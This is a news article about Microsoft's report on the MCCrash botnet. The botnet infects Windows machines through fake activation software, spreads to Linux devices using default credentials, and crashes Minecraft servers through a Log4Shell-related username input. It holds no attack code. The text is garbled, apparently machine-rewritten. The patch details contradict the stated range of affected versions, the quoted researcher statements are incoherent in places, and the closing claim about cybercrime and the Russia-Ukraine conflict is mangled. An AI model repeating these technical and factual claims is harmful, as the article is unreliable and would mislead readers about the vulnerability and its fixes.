Microsoft researchers discover a Windows-Linux botnet that can take down Minecraft server in “Efficient” distributed denial of service attack.
According to reports Ars Technica (opens in a new tab)The MCCrash botnet sends a command that populates a username input dialog in the login page of a Minecraft server, crashing the server by exhausting its resources.
“The use of an environment variable triggers log4j 2 library, resulting in abnormal consumption of system resources (with [the] Log4Shell Vulnerability), demonstrating a specific and highly effective DDoS method,” wrote the Microsoft researchers.
Widespread impact of the MCCrash botnet
Microsoft also noted that MCCrash is capable of crashing servers running various versions of the game server software.
This is where it gets a little complicated: MCCrash itself is only hardcoded to target version 1.12.2, but the attack technique is powerful enough to destroy servers running versions 1.7.2 through 1.18.2, which Ars Technica estimate That’s about half of all Minecraft services running today.
Patch Version 1.9 of the server software disables the botnet’s technique, but even without that, Microsoft is thankful that the botnet’s impact was limited.
“Wide range of at-risk Minecraft servers underscores impact malicious software If it was specifically coded to affect versions after 1.12.2, it could be affected,” wrote the Microsoft researchers.
“This threat exploits the unique capabilities of Internet of Things (IoT) devices, which are not typically monitored as part of a botnet, greatly increasing its impact and reducing the chance of detection.”
The most common initial infection points for MCCcrash are Windows Machines installed with software that claims to activate the operating system with an illegal license, but mostly contains malware that delays the installation of python scripts that provide the logic of the botnet.
Infected Windows devices then scan the internet for devices that are running Linux distribution Such as Debian, Ubuntu, and CentOS, and run the same .py script on these new devices using default login credentials, which can then be used to launch DDoS attacks on Minecraft servers and other devices.
Microsoft did not disclose the number of devices infected by MCCrash, but Ars Technica Claims geographic breakdown shows many are in Russia, echoes 2022 Microsoft Digital Defense Reportclaiming that the Russia-Ukraine conflict is driven in part by cybercrime.